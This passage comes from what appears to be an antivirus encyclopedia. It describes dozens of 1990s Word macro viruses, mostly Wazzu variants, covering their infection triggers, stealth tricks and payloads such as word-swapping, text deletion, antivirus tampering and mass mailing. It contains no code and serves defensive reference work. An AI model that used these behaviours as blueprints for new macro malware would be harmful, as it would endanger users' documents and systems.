  25928. Twolines.A devolves into Twolines.A1, which does not contain
  25929. the "FileSaveAs" macro.
  25930.  
  25931. For this to happen certain conditions have to be present:
  25932.  
  25933. 1. Automacros are disabled when opening an infected document.
  25934. 2. Document is closed (AutoClose).
  25935. 3. Global template contains macros.
  25936.  
  25937. [Word_UglyKid.A]
  25938. Virus name: Word.Uglykid.A
  25939. Virus Type: Word macro virus
  25940. Number of macros: 3-4
  25941. Encrypted: Yes
  25942. Macro names: AutoOpen, (ToolsMacro, FileSave)
  25943. Size of macros: Polymorphic
  25944. Place of origin: Slovakia
  25945. Date of origin: April 1997
  25946. Payload: Yes
  25947. Seen In-The-Wild: No
  25948. Description:
  25949.  
  25950. Uglykid.A is another Polymorphic macro virus, that can not be
  25951. detected with a simple signature or with exact CRC detection.
  25952.  
  25953. UglyKid.A uses "ToolsMacro" to make recognition of an
  25954. infected document more difficult (called macro stealth technique).
  25955. It also removes the File|Templates menu item so users can
  25956. not look for viral macros on an infected system.
  25957. It is advised not to select the "ToolsMacro" menu item, since
  25958. it is used to execute the virus code.
  25959.  
  25960. UglyKid.A also infects further documents when the "FileSave"
  25961. command is used.
  25962.  
  25963. While most other Polymorphic viruses are fairly slow and
  25964. visible to the user, UglyKid.A tries to hide the macro editing
  25965. bar. Instead it shows a gray bar for a very short time.
  25966.  
  25967. The payload of UglyKid.A changes the "User Info" item in the
  25968. Tool|Option menu. It adds the following comments:
  25969.  
  25970. "   Name: Nasty   "
  25971.  
  25972. "   Initial: Ugly   "
  25973.  
  25974. In order to detect UglyKid.A, we advise to use an anti-virus
  25975. program that does smart checksumming.
  25976.  
  25977. [Word_Wallpaper.A]
  25978. Virus name: Word.Wallpaper.A
  25979. Virus Type: Word macro virus
  25980. Number of macros: 2 (or 5)
  25981. Encrypted: No
  25982. Macro names: AutoOpen, FilePrint (ToolsMacro, FileTemplates
  25983.              ToolsCustomize)
  25984. Size of macros: 7353 Bytes in documents
  25985.                 29088 Bytes in global template
  25986. Place of origin: Unknown
  25987. Date of origin: Spring 1997
  25988. Payload: Yes
  25989. Seen In-The-Wild: No
  25990. Description:
  25991.  
  25992. Wallpaper.A infects the global template (normal.dot) when an
  25993. infected document is opened. Further documents become
  25994. infected when they are also opened (AutoOpen) or one of the
  25995. following menu items is selected:
  25996.  
  25997. FilePrint
  25998. FileTemplates
  25999. ToolsMacro
  26000. ToolsCustomize
  26001.  
  26002. Wallpaper uses FileTemplate, ToolsCustomize and ToolsMacro
  26003. to make recognition of an infected document more difficult
  26004. (called macro stealth technique).
  26005.  
  26006. On the 31st of each month, Wallpaper drops an image of a dead
  26007. head (SK2.BMP). It then modifies AUTOEXEC.BAT and
  26008. WIN.INI in order to change the background image of Windows.
  26009.  
  26010. The following file is also created in the C:\WINDOWS directory:
  26011.  
  26012. "   REGSK2.REG   "
  26013.  
  26014. Wallpaper also shows the following message on the 31st of each
  26015. month:
  26016.  
  26017. "   [!!!PIRATE VIRUS!!!]--Active! The [PIRATE VIRUS] has pillaged   "
  26018. "   your computer! GO BACK TO MS-WORD??   "
  26019.  
  26020. [Word_Weather.A:Tw (aka Fish)]
  26021. Virus name: Word.Weather.A:Tw (aka Fish)
  26022. Virus Type: Word macro virus
  26023. Number of macros: 4
  26024. Encrypted: Yes
  26025. Macro names: AutoOpen, AutoNew, AutoExec,ToolsMacro
  26026. Size of macros: 4849 Bytes
  26027. Place of origin: Taiwan
  26028. Date of origin: 1996
  26029. Payload: Yes
  26030. Seen In-The-Wild: Yes
  26031. Description:
  26032.  
  26033. Weather.A activates when an infected document is opened.
  26034. It then displays a message and asks for user input. To continue
  26035. working, the user has to input the right answer.
  26036.  
  26037. It uses "ToolsMacro" to make recognition of an infected
  26038. document more difficult (called macro stealth technique).
  26039.  
  26040. Weather uses language specific commands, therefore it
  26041. only works with the Chinese/Taiwanese version of Microsoft Word.
  26042.  
  26043. [Word_Wazzu.A]
  26044. Virus name: Word.Wazzu.A
  26045. Virus Type: Word macro virus
  26046. Number of macros: 1
  26047. Encrypted: No
  26048. Macro names: AutoOpen
  26049. Size of macros: 632 Bytes
  26050. Place of origin: Washington, USA
  26051. Date of origin: Posted to Usenet in April 1996
  26052. Destructive: Yes
  26053. Common In-The-Wild: Yes
  26054. Description:
  26055.  
  26056. When an infected document is opened, Wazzu.A checks the
  26057. name of the active document. If it is "normal.dot", then the
  26058. virus macro is copied from the global template to the open
  26059. document.  Otherwise normal.dot becomes infected.
  26060.  
  26061. Wazzu does not check if a document is already infected. It
  26062. simply overwrites the "autoopen" macro.
  26063.  
  26064. Wazzu has a destructive payload. It picks a random number
  26065. between 0 and 1 and if the number is smaller than 0.2
  26066. (probability of 20 percent), the virus will move a word from
  26067. one place in the document to another.  This is repeated three
  26068. times. So the probability for a Word to be moved is 48.8
  26069. percent. After the third time, Wazzu picks a final random
  26070. number (between 0 and 1) and if the value is larger than 0.25
  26071. (probability of 25 percent), the word "Wazzu" will be inserted
  26072. into the document.
  26073.  
  26074. After an infected documents is cleaned, it has to be checked
  26075. carefully because chances of having a modified document
  26076. (words swapped or added) are over 61 percent. This can be a
  26077. very time consuming job with large documents.
  26078.  
  26079. Wazzu is a nickname for the Washington State University.
  26080.  
  26081. Wazzu.A has also been convert to the Word97 Word format (Word8).
  26082.  
  26083. [Word_Wazzu.AA]
  26084. Virus name: Word.Wazzu.AA
  26085. Virus Type: Word macro virus
  26086. Number of macros: 1
  26087. Encrypted: No
  26088. Macro names: AutoOpen
  26089. Size of macros: 1624 Bytes
  26090. Place of origin: Unknown
  26091. Date of origin: 1997
  26092. Destructive: No
  26093. Common In-The-Wild: No
  26094. Description:
  26095.  
  26096. The difference between this new variant and the original
  26097. Wazzu.A virus is that Wazzu.AA does not add the word
  26098. "wazzu" to newly opened documents.
  26099.  
  26100. Wazzu.AA infects the global template (normal.dot) when an
  26101. infected document is opened. Further documents become
  26102. infected when they are also opened (AutoOpen).
  26103.  
  26104. [Word_Wazzu.AB]
  26105. Virus name: Word.Wazzu.AB
  26106. Virus Type: Word macro virus
  26107. Number of macros: 1
  26108. Encrypted: No
  26109. Macro names: AutoOpen
  26110. Size of macros: 323 Bytes
  26111. Place of origin: Australia
  26112. Date of origin: February 1997
  26113. Destructive: No
  26114. Common In-The-Wild: No
  26115. Description:
  26116.  
  26117. The main difference between this new variant and previous
  26118. Wazzu viruses is that Wazzu.AB is another "do-nothing" macro
  26119. virus with no payload and some modified codes.
  26120.  
  26121. It infects the global template when an infected document is
  26122. opened. Further documents become infected when they are also
  26123. opened (AutoOpen).
  26124.  
  26125. [Word_Wazzu.AC]
  26126. Virus name: Word.Wazzu.AC
  26127. Virus Type: Word macro virus
  26128. Number of macros: 1
  26129. Encrypted: No
  26130. Macro names: AutoOpen
  26131. Size of macros: 433 Bytes
  26132. Place of origin: Unknown
  26133. Date of origin: 1997
  26134. Destructive: No
  26135. Common In-The-Wild: No
  26136. Description:
  26137.  
  26138. The main difference between this new variant and previous
  26139. Wazzu viruses is that Wazzu.AC is another "do-nothing" macro
  26140. virus with some code modifications and no payload.
  26141.  
  26142. It infects the global template when an infected document is
  26143. opened. Further documents become infected when they are also
  26144. opened (AutoOpen).
  26145.  
  26146. [Word_Wazzu.AD]
  26147. Virus name: Word.Wazzu.AD
  26148. Virus Type: Word macro virus
  26149. Number of macros: 1
  26150. Encrypted: No
  26151. Macro names: AutoOpen
  26152. Size of macros: 332 Bytes
  26153. Place of origin: Unknown
  26154. Date of origin: 1997
  26155. Destructive: No
  26156. Common In-The-Wild: No
  26157. Description:
  26158.  
  26159. The main difference between this new variant and previous
  26160. Wazzu viruses is that Wazzu.AD is another "do-nothing" macro
  26161. virus with some code modifications and no payload.
  26162.  
  26163. It infects the global template when an infected document is
  26164. opened. Further documents become infected when they are also
  26165. opened (AutoOpen).
  26166.  
  26167. [Word_Wazzu.AE]
  26168. Virus name: Word.Wazzu.AE
  26169. Virus Type: Word macro virus
  26170. Number of macros: 1
  26171. Encrypted: No
  26172. Macro names: AutoOpen
  26173. Size of macros: 618 Bytes
  26174. Place of origin: Unknown
  26175. Date of origin: 1997
  26176. Destructive: Yes
  26177. Common In-The-Wild: No
  26178. Description:
  26179.  
  26180. The main difference between this new variant and previous
  26181. Wazzu viruses is that Wazzu.AE has a slightly modified code.
  26182.  
  26183. It infects the global template when an infected document is
  26184. opened. Further documents become infected when they are also
  26185. opened (AutoOpen).
  26186.  
  26187. The payload is similar to the original Wazzu virus. There is a
  26188. 3/5 chance that one word is moved to another position in the
  26189. active document.
  26190.  
  26191. [Word_Wazzu.AF]
  26192. Virus name: Word.Wazzu.AF
  26193. Virus Type: Word macro virus
  26194. Number of macros: 1
  26195. Encrypted: No
  26196. Macro names: AutoOpen
  26197. Size of macros: 1484 Bytes
  26198. Place of origin: USA
  26199. Date of origin: December 1996
  26200. Destructive: No
  26201. Common In-The-Wild: No
  26202. Description:
  26203.  
  26204. Wazzu.AF is a new variant based on the older Wazzu.D
  26205. virus.  The only difference between the two viruses is that the
  26206. first blank line has been deleted.
  26207.  
  26208. For more information, please refer to the Wazzu.D virus
  26209. description.
  26210.  
  26211. [Word_Wazzu.AG]
  26212. Virus name: Word.Wazzu.AG
  26213. Virus Type: Word macro virus
  26214. Number of macros: 1
  26215. Encrypted: No
  26216. Macro names: AutoOpen
  26217. Size of macros: 332 Bytes
  26218. Place of origin: Unknown
  26219. Date of origin: 1997
  26220. Destructive: No
  26221. Common In-The-Wild: No
  26222. Description:
  26223.  
  26224. The main difference between this new variant and previous
  26225. Wazzu viruses is that Wazzu.AG is another "do-nothing" macro
  26226. virus with some code modifications and no payload.
  26227.  
  26228. It infects the global template when an infected document is
  26229. opened. Further documents become infected when they are also
  26230. opened (AutoOpen).
  26231.  
  26232. [Word_Wazzu.AH]
  26233. Virus name: Word.Wazzu.AH
  26234. Virus Type: Word macro virus
  26235. Number of macros: 1
  26236. Encrypted: No
  26237. Macro names: AutoOpen
  26238. Size of macros: 557 Bytes
  26239. Place of origin: USA
  26240. Date of origin: February 1997
  26241. Destructive: Yes
  26242. Common In-The-Wild: No
  26243. Description:
  26244.  
  26245. The main difference between this new variant and previous
  26246. Wazzu viruses is that Wazzu.AH has some code modifications.
  26247.  
  26248. Its payload inserts the word "YaHoo" instead of "wazzu".
  26249. The second payload, which moves words from one position to
  26250. another, is similar to Wazzu.A.
  26251.  
  26252. Wazzu.AH infects the global template when an infected
  26253. document is opened. Further documents become infected
  26254. when they are also opened (AutoOpen).
  26255.  
  26256. [Word_Wazzu.AI]
  26257. Virus name: Word.Wazzu.AI
  26258. Virus Type: Word macro virus
  26259. Number of macros: 1
  26260. Encrypted: No
  26261. Macro names: AutoOpen
  26262. Size of macros: 794 Bytes
  26263. Place of origin: Unknown
  26264. Date of origin: 1997
  26265. Destructive: No
  26266. Common In-The-Wild: No
  26267. Description:
  26268.  
  26269. The main difference between this new variant and previous
  26270. Wazzu viruses is that Wazzu.AI is another "do-nothing" macro
  26271. virus with some code modifications and no payload.
  26272.  
  26273. It infects the global template when an infected document is
  26274. opened. Further documents become infected when they are also
  26275. opened (AutoOpen).
  26276.  
  26277. [Word_Wazzu.AJ]
  26278. Virus name: Word.Wazzu.AJ
  26279. Virus Type: Word macro virus
  26280. Number of macros: 1
  26281. Encrypted: No
  26282. Macro names: AutoOpen
  26283. Size of macros: 430 Bytes
  26284. Place of origin: Unknown
  26285. Date of origin: 1997
  26286. Destructive: No
  26287. Common In-The-Wild: No
  26288. Description:
  26289.  
  26290. The main difference between this new variant and previous
  26291. Wazzu viruses is that Wazzu.AJ is another "do-nothing" macro
  26292. virus with some code modifications and no payload.
  26293.  
  26294. It infects the global template when an infected document is
  26295. opened. Further documents become infected when they are also
  26296. opened (AutoOpen).
  26297.  
  26298. [Word_Wazzu.AK]
  26299. Virus name: Word.Wazzu.AK
  26300. Virus Type: Word macro virus
  26301. Number of macros: 1
  26302. Encrypted: No
  26303. Macro names: autoOpen
  26304. Size of macros: 344 Bytes
  26305. Place of origin: Unknown
  26306. Date of origin: 1997
  26307. Destructive: No
  26308. Common In-The-Wild: No
  26309. Description:
  26310.  
  26311. The main difference between this new variant and previous
  26312. Wazzu viruses is that Wazzu.AK is another "do-nothing" macro
  26313. virus with code modifications and no payload.
  26314.  
  26315. It infects the global template when an infected document is
  26316. opened. Further documents become infected when they are also
  26317. opened (AutoOpen).
  26318.  
  26319. [Word_Wazzu.AL]
  26320. Virus name: Word.Wazzu.AL
  26321. Virus Type: Word macro virus
  26322. Number of macros: 1
  26323. Encrypted: No
  26324. Macro names: AutoOpen
  26325. Size of macros: 643 Bytes
  26326. Place of origin: Unknown
  26327. Date of origin: 1997
  26328. Destructive: Yes
  26329. Common In-The-Wild: No
  26330. Description:
  26331.  
  26332. The main difference between this new variant and previous
  26333. Wazzu viruses is that Wazzu.AL has a slightly modified code.
  26334.  
  26335. It infects the global template when an infected document is
  26336. opened. Further documents become infected when they are also
  26337. opened (AutoOpen).
  26338.  
  26339. The payload is similar to the original Wazzu virus. For
  26340. additional information, please refer to the Wazzu.A virus
  26341. description.
  26342.  
  26343. [Word_Wazzu.AM]
  26344. Virus name: Word.Wazzu.AM
  26345. Virus Type: Word macro virus
  26346. Number of macros: 1
  26347. Encrypted: No
  26348. Macro names: AutoOpen
  26349. Size of macros: 606 Bytes
  26350. Place of origin: Unknown
  26351. Date of origin: 1997
  26352. Destructive: Yes
  26353. Common In-The-Wild: No
  26354. Description:
  26355.  
  26356. The main difference between this new variant and previous
  26357. Wazzu viruses is that Wazzu.AM has a slightly modified code.
  26358.  
  26359. It infects the global template when an infected document is
  26360. opened. Further documents become infected when they are also
  26361. opened (AutoOpen).
  26362.  
  26363. The payload is similar to the original Wazzu virus. There is a
  26364. 3/5 chance that one word is moved to another position in the
  26365. active document.
  26366.  
  26367. [Word_Wazzu.AN]
  26368. Virus name: Word.Wazzu.AN
  26369. Virus Type: Word macro virus
  26370. Number of macros: 1
  26371. Encrypted: No
  26372. Macro names: AutoOpen
  26373. Size of macros: 375 Bytes
  26374. Place of origin: Unknown
  26375. Date of origin: 1997
  26376. Destructive: No
  26377. Common In-The-Wild: No
  26378. Description:
  26379.  
  26380. The main difference between this new variant and previous
  26381. Wazzu viruses is that Wazzu.AN is another "do-nothing" macro
  26382. virus with some code modifications and no payload.
  26383.  
  26384. It infects the global template when an infected document is
  26385. opened. Further documents become infected when they are also
  26386. opened (AutoOpen).
  26387.  
  26388. It also contains the following comment in its code:
  26389.  
  26390. "   REM This macro wipes out the Wazzu Virus!   "
  26391.  
  26392. [Word_Wazzu.AO]
  26393. Virus name: Word.Wazzu.AO
  26394. Virus Type: Word macro virus
  26395. Number of macros: 1
  26396. Encrypted: No
  26397. Macro names: AutoOpen
  26398. Size of macros: 626 Bytes
  26399. Place of origin: Unknown
  26400. Date of origin: 1997
  26401. Destructive: Yes
  26402. Common In-The-Wild: No
  26403. Description:
  26404.  
  26405. The main difference between this new variant and previous
  26406. Wazzu viruses is that Wazzu.AO has a slightly modified code.
  26407.  
  26408. It infects the global template when an infected document is
  26409. opened. Further documents become infected when they are also
  26410. opened (AutoOpen).
  26411.  
  26412. The payload is similar to the original Wazzu virus. For
  26413. additional information, please refer to the Wazzu.A virus
  26414. description.
  26415.  
  26416. [Word_Wazzu.AP]
  26417. Virus name: Word.Wazzu.AP
  26418. Virus Type: Word macro virus
  26419. Number of macros: 1
  26420. Encrypted: No
  26421. Macro names: autoOpen
  26422. Size of macros: 432 Bytes
  26423. Place of origin: USA
  26424. Date of origin: February 1997
  26425. Destructive: No
  26426. Common In-The-Wild: No
  26427. Description:
  26428.  
  26429. The main difference between this new variant and previous
  26430. Wazzu viruses is that Wazzu.AP is another "do-nothing" macro
  26431. virus with some code modifications and no payload.
  26432.  
  26433. It infects the global template when an infected document is
  26434. opened. Further documents become infected when they are also
  26435. opened (AutoOpen).
  26436.  
  26437. [Word_Wazzu.AQ]
  26438. Virus name: Word.Wazzu.AQ
  26439. Virus Type: Word macro virus
  26440. Number of macros: 1
  26441. Encrypted: No
  26442. Macro names: autoOpen
  26443. Size of macros: 437 Bytes
  26444. Place of origin: USA
  26445. Date of origin: February 1997
  26446. Destructive: No
  26447. Common In-The-Wild: No
  26448. Description:
  26449.  
  26450. The main difference between this new variant and previous
  26451. Wazzu viruses is that Wazzu.AQ is another "do-nothing" macro
  26452. virus with a corrupted payload and some missing commands.
  26453.  
  26454. It infects the global template when an infected document is
  26455. opened. Further documents become infected when they are also
  26456. opened (AutoOpen).
  26457.  
  26458. [Word_Wazzu.AR]
  26459. Virus name: Word.Wazzu.AR
  26460. Virus Type: Word macro virus
  26461. Number of macros: 1
  26462. Encrypted: No
  26463. Macro names: autoOpen
  26464. Size of macros: 563 Bytes
  26465. Place of origin: Germany
  26466. Date of origin: February 1997
  26467. Destructive: Yes
  26468. Common In-The-Wild: No
  26469. Description:
  26470.  
  26471. The main difference between this new variant and previous
  26472. Wazzu viruses is that Wazzu.AR has a slightly modified
  26473. code.
  26474.  
  26475. It infects the global template when an infected document is
  26476. opened. Further documents become infected when they are also
  26477. opened (AutoOpen).
  26478.  
  26479. The payload is similar to the original Wazzu virus. For
  26480. more information, please refer to the Wazzu.A virus
  26481. description.
  26482.  
  26483. [Word_Wazzu.AS]
  26484. Virus name: Word.Wazzu.AS
  26485. Virus Type: Word macro virus
  26486. Number of macros: 1
  26487. Encrypted: No
  26488. Macro names: AutoOpen
  26489. Size of macros: 352 Bytes
  26490. Place of origin: Unknown
  26491. Date of origin: 1996
  26492. Destructive: Yes
  26493. Common In-The-Wild: No
  26494. Description:
  26495.  
  26496. The main difference between this new variant and Wazzu.L
  26497. is that Wazzu.AS has some modified codes.
  26498.  
  26499. It infects the global template when an infected document is
  26500. opened. Further documents become infected when they are also
  26501. opened (AutoOpen).
  26502.  
  26503. When a user opens a document, Wazzu.AS adds the following
  26504. text at the end of the document:
  26505.  
  26506. "   ladderwork!   "
  26507.  
  26508. [Word_Wazzu.AT]
  26509. Virus name: Word.Wazzu.AT
  26510. Virus Type: Word macro virus
  26511. Number of macros: 1
  26512. Encrypted: No
  26513. Macro names: AutoOpen
  26514. Size of macros: 576 Bytes
  26515. Place of origin: Unknown
  26516. Date of origin: 1997
  26517. Destructive: Yes
  26518. Common In-The-Wild: No
  26519. Description:
  26520.  
  26521. The main difference between this new variant and previous
  26522. Wazzu viruses is that Wazzu.AT has a slightly modified code.
  26523.  
  26524. It infects the global template when an infected document is
  26525. opened. Further documents become infected when they are also
  26526. opened (AutoOpen).
  26527.  
  26528. The payload is similar to the original Wazzu virus. There is a
  26529. 3/5 chance that one word is moved to another position in the
  26530. active document.
  26531.  
  26532. [Word_Wazzu.AU]
  26533. Virus name: Word.Wazzu.AU
  26534. Virus Type: Word macro virus
  26535. Number of macros: 1
  26536. Encrypted: No
  26537. Macro names: AutoOpen
  26538. Size of macros: 630 Bytes
  26539. Place of origin: Unknown
  26540. Date of origin: 1997
  26541. Destructive: Yes
  26542. Common In-The-Wild: No
  26543. Description:
  26544.  
  26545. The main difference between this new variant and previous
  26546. Wazzu viruses is that Wazzu.AU has a slightly modified code.
  26547.  
  26548. It infects the global template when an infected document is
  26549. opened. Further documents become infected when they are also
  26550. opened (AutoOpen).
  26551.  
  26552. The payload is similar to the original Wazzu virus. For
  26553. additional information, please refer to the Wazzu.A virus
  26554. description.
  26555.  
  26556. [Word_Wazzu.AV]
  26557. Virus name: Word.Wazzu.AV
  26558. Virus Type: Word macro virus
  26559. Number of macros: 1
  26560. Encrypted: No
  26561. Macro names: AutoOpen
  26562. Size of macros: 321 Bytes
  26563. Place of origin: Unknown
  26564. Date of origin: Spring 1997
  26565. Destructive: No
  26566. Common In-The-Wild: No
  26567. Description:
  26568.  
  26569. The main difference between this new variant and previous
  26570. Wazzu viruses is that Wazzu.AV is another "do-nothing" macro
  26571. virus with small code modifications and no payload.
  26572.  
  26573. It infects the global template when an infected document is
  26574. opened. Further documents become infected when they are also
  26575. opened (AutoOpen).
  26576.  
  26577. [Word_Wazzu.AW]
  26578. Virus name: Word.Wazzu.AW
  26579. Virus Type: Word macro virus
  26580. Number of macros: 1
  26581. Encrypted: Yes
  26582. Macro names: AutoOpen
  26583. Size of macros: 1135 Bytes
  26584. Place of origin: USA
  26585. Date of origin: February 1997
  26586. Destructive: Yes
  26587. Common In-The-Wild: No
  26588. Description:
  26589.  
  26590. The main difference between this new variant and previous
  26591. Wazzu viruses is that Wazzu.AW is a combination of the
  26592. Wazzu virus and the ShareFun virus. It contains payloads from
  26593. both viruses.
  26594.  
  26595. Wazzu.AW moves words from one place to another, it enters
  26596. the word "wazzu" to the active document, and tries to mail
  26597. an infected document (C:\doc1.doc) to 3 randomly chosen
  26598. addresses from the MS Mail address book.
  26599.  
  26600. For further details, please refer to the Wazzu.A and
  26601. Sharefun.A virus description.
  26602.  
  26603. [Word_Wazzu.AX]
  26604. Virus name: Word.Wazzu.AX
  26605. Virus Type: Word macro virus
  26606. Number of macros: 1
  26607. Encrypted: No
  26608. Macro names: AutoOpen
  26609. Size of macros: 343 Bytes
  26610. Place of origin: USA
  26611. Date of origin: Spring 1997
  26612. Destructive: No
  26613. Common In-The-Wild: No
  26614. Description:
  26615.  
  26616. The main difference between this new variant and previous
  26617. Wazzu viruses is that Wazzu.AX is another "do-nothing" macro
  26618. virus with small code modifications and no payload.
  26619.  
  26620. It infects the global template when an infected document is
  26621. opened. Further documents become infected when they are also
  26622. opened (AutoOpen).
  26623.  
  26624. [Word_Wazzu.AY]
  26625. Virus name: Word.Wazzu.AY
  26626. Virus Type: Word macro virus
  26627. Number of macros: 1
  26628. Encrypted: No
  26629. Macro names: AutoOpen
  26630. Size of macros: 632 Bytes
  26631. Place of origin: Unknown
  26632. Date of origin: February 1997
  26633. Destructive: No
  26634. Common In-The-Wild: No
  26635. Description:
  26636.  
  26637. The main difference between this new variant and previous
  26638. Wazzu viruses is that Wazzu.AY is another "do-nothing" macro
  26639. virus with a corrupted payload and a 2-byte code modification.
  26640.  
  26641. It infects the global template when an infected document is
  26642. opened. Further documents become infected when they are also
  26643. opened (AutoOpen).
  26644.  
  26645. [Word_Wazzu.AZ]
  26646. Virus name: Word.Wazzu.AZ
  26647. Virus Type: Word macro virus
  26648. Number of macros: 1
  26649. Encrypted: No
  26650. Macro names: AutoClose
  26651. Size of macros: 659 Bytes
  26652. Place of origin: USA
  26653. Date of origin: February 1997
  26654. Destructive: Yes
  26655. Common In-The-Wild: No
  26656. Description:
  26657.  
  26658. The main difference between this new variant and previous
  26659. Wazzu viruses is that Wazzu.AZ has some code modifications.
  26660.  
  26661. Its payload inserts the word "uzzaw" (wazzu backwards).
  26662.  
  26663. Wazzu.AZ also uses the "AutoClose" macro instead of
  26664. "AutoOpen".  It infects the global template when an infected
  26665. document is closed.  Further documents become infected when
  26666. they are also closed (AutoClose).
  26667.  
  26668. [Word_Wazzu.B]
  26669. Virus name: Word.Wazzu.B
  26670. Virus Type: Word macro virus
  26671. Number of macros: 1
  26672. Encrypted: No
  26673. Macro names: AutoOpen
  26674. Size of macros: 697 Bytes
  26675. Place of origin: Unknown
  26676. Date of origin: 1996
  26677. Destructive: Yes
  26678. Common In-The-Wild: No
  26679. Description:
  26680.  
  26681. The difference between this new variant and the original
  26682. Wazzu.A virus is that Wazzu.B has an additional, unimportant,
  26683. virus comment.
  26684.  
  26685. For more information, please refer to the Wazzu.A virus
  26686. description.
  26687.  
  26688. [Word_Wazzu.BA]
  26689. Virus name: Word.Wazzu.BA
  26690. Virus Type: Word macro virus
  26691. Number of macros: 1
  26692. Encrypted: No
  26693. Macro names: AutoClose
  26694. Size of macros: 277 Bytes
  26695. Place of origin: USA
  26696. Date of origin: February 1997
  26697. Destructive: No
  26698. Common In-The-Wild: No
  26699. Description:
  26700.  
  26701. The main difference between this new variant and previous
  26702. Wazzu viruses is that Wazzu.BA has a slightly modified
  26703. code with no payload. It also uses the "AutoClose" macro
  26704. instead of "AutoOpen".
  26705.  
  26706. It infects the global template when an infected document is
  26707. closed. Further documents become infected when they are also
  26708. closed (AutoClose).
  26709.  
  26710. [Word_Wazzu.BB]
  26711. Virus name: Word.Wazzu.BB
  26712. Virus Type: Word macro virus
  26713. Number of macros: 1
  26714. Encrypted: No
  26715. Macro names: AutoOpen
  26716. Size of macros: 434 Bytes
  26717. Place of origin: Unknown
  26718. Date of origin: Spring 1997
  26719. Destructive: No
  26720. Common In-The-Wild: No
  26721. Description:
  26722.  
  26723. The main difference between this new variant and previous
  26724. Wazzu viruses is that Wazzu.BB is another "do-nothing" macro
  26725. virus with small code modifications and no payload.
  26726.  
  26727. It infects the global template when an infected document is
  26728. opened. Further documents become infected when they are also
  26729. opened (AutoOpen).
  26730.  
  26731. [Word_Wazzu.BC]
  26732. Virus name: Word.Wazzu.BC
  26733. Virus Type: Word macro virus
  26734. Number of macros: 1
  26735. Encrypted: No
  26736. Macro names: AutoOpen
  26737. Size of macros: 862 Bytes
  26738. Place of origin: Unknown
  26739. Date of origin: Spring 1997
  26740. Destructive: Yes
  26741. Common In-The-Wild: No
  26742. Description:
  26743.  
  26744. The main difference between this new variant and previous
  26745. Wazzu viruses is that Wazzu.BC targets an anti-virus
  26746. program in its payload.
  26747.  
  26748. It renames the default directory of VET (Australian product).
  26749.  
  26750. Wazzu.BC also contains other payloads where it moves words
  26751. and enters the following words to newly opened documents:
  26752. (probability differs in each case)
  26753.  
  26754. "   waffle   "
  26755.  
  26756. "   zoom   "
  26757.  
  26758. "   kill   "
  26759.  
  26760. "   mum   "
  26761.  
  26762.  
  26763. Wazzu.BC infects the global template when an infected
  26764. document is opened. Further documents become infected when
  26765. they are also opened (AutoOpen).
  26766.  
  26767. [Word_Wazzu.BD]
  26768. Virus name: Word.Wazzu.BD
  26769. Virus Type: Word macro virus
  26770. Number of macros: 1
  26771. Encrypted: Yes
  26772. Macro names: AutoOpen
  26773. Size of macros: 525 Bytes
  26774. Place of origin: Unknown
  26775. Date of origin: Spring 1997
  26776. Destructive: Yes
  26777. Common In-The-Wild: No
  26778. Description:
  26779.  
  26780. The main difference between this new variant and previous
  26781. Wazzu viruses is that Wazzu.BD selects all text of a newly
  26782. opened document and then deletes it.
  26783.  
  26784. Recovery is impossible since Wazzu.BD also removes the
  26785. EDIT|EDITUNDO menu item.
  26786.  
  26787. This payload triggers with a chance of 1/50.
  26788.  
  26789. Wazzu.BD also shows the following message:
  26790.  
  26791. "   Where do you want to go today   "
  26792.  
  26793. Wazzu.BD infects the global template when an infected
  26794. document is opened. Further documents become infected
  26795. when they are also opened (AutoOpen).
  26796.  
  26797. [Word_Wazzu.BE]
  26798. Virus name: Word.Wazzu.BE
  26799. Virus Type: Word macro virus
  26800. Number of macros: 1
  26801. Encrypted: No
  26802. Macro names: AutoOpen
  26803. Size of macros: 439 Bytes
  26804. Place of origin: Unknown
  26805. Date of origin: Spring 1997
  26806. Destructive: No
  26807. Common In-The-Wild: No
  26808. Description:
  26809.  
  26810. The main difference between this new variant and previous
  26811. Wazzu viruses is that Wazzu.BE shows the following
  26812. message during infection:
  26813.  
  26814. "   Wazzu n'est pas mort   "
  26815.  
  26816. Wazzu.BE infects the global template when an infected
  26817. document is opened. Further documents become infected
  26818. when they are also opened (AutoOpen).
  26819.  
  26820. [Word_Wazzu.BF]
  26821. Virus name: Word.Wazzu.BF
  26822. Virus Type: Word macro virus
  26823. Number of macros: 1
  26824. Encrypted: No
  26825. Macro names: AutoOpen
  26826. Size of macros: 334 Bytes
  26827. Place of origin: USA
  26828. Date of origin: Spring 1997
  26829. Destructive: No
  26830. Common In-The-Wild: No
  26831. Description:
  26832.  
  26833. The main difference between this new variant and previous
  26834. Wazzu viruses is that Wazzu.BF is another "do-nothing" macro
  26835. virus with small code modifications and no payload.
  26836.  
  26837. It infects the global template when an infected document is
  26838. opened. Further documents become infected when they are also
  26839. opened (AutoOpen).
  26840.  
  26841. [Word_Wazzu.BG]
  26842. Virus name: Word.Wazzu.BG
  26843. Virus Type: Word macro virus
  26844. Number of macros: 1
  26845. Encrypted: No
  26846. Macro names: AutoOpen
  26847. Size of macros: 432 Bytes
  26848. Place of origin: Unknown
  26849. Date of origin: Spring 1997
  26850. Destructive: No
  26851. Common In-The-Wild: No
  26852. Description:
  26853.  
  26854. The main difference between this new variant and previous
  26855. Wazzu viruses is that Wazzu.BG is another "do-nothing" macro
  26856. virus with no payload.
  26857.  
  26858. It infects the global template when an infected document is
  26859. opened. Further documents become infected when they are also
  26860. opened (AutoOpen).
  26861.  
  26862. [Word_Wazzu.BH]
  26863. Virus name: Word.Wazzu.BH
  26864. Virus Type: Word macro virus
  26865. Number of macros: 1
  26866. Encrypted: No
  26867. Macro names: AutoOpen
  26868. Size of macros: 472 Bytes
  26869. Place of origin: Unknown
  26870. Date of origin: Spring 1997
  26871. Payload: Yes
  26872. Common In-The-Wild: No
  26873. Description:
  26874.  
  26875. The main difference between this new variant and previous
  26876. Wazzu viruses is that Wazzu.BH tries to remove all text
  26877. from a newly opened document.
  26878.  
  26879. It does not remove the "Edit|Undo" option, thus users can
  26880. recover after the text disappears.
  26881.  
  26882. It infects the global template when an infected document is
  26883. opened. Further documents become infected when they are also
  26884. opened (AutoOpen).
  26885.  
  26886. [Word_Wazzu.BI]
  26887. Virus name: Word.Wazzu.BI
  26888. Virus Type: Word macro virus
  26889. Number of macros: 1
  26890. Encrypted: No
  26891. Macro names: AutoOpen
  26892. Size of macros: 361 Bytes
  26893. Place of origin: Unknown
  26894. Date of origin: Spring 1997
  26895. Destructive: No
  26896. Common In-The-Wild: No
  26897. Description:
  26898.  
  26899. The main difference between this new variant and previous
  26900. Wazzu viruses is that Wazzu.BI is another "do-nothing" macro
  26901. virus with some code modifications and no payload.
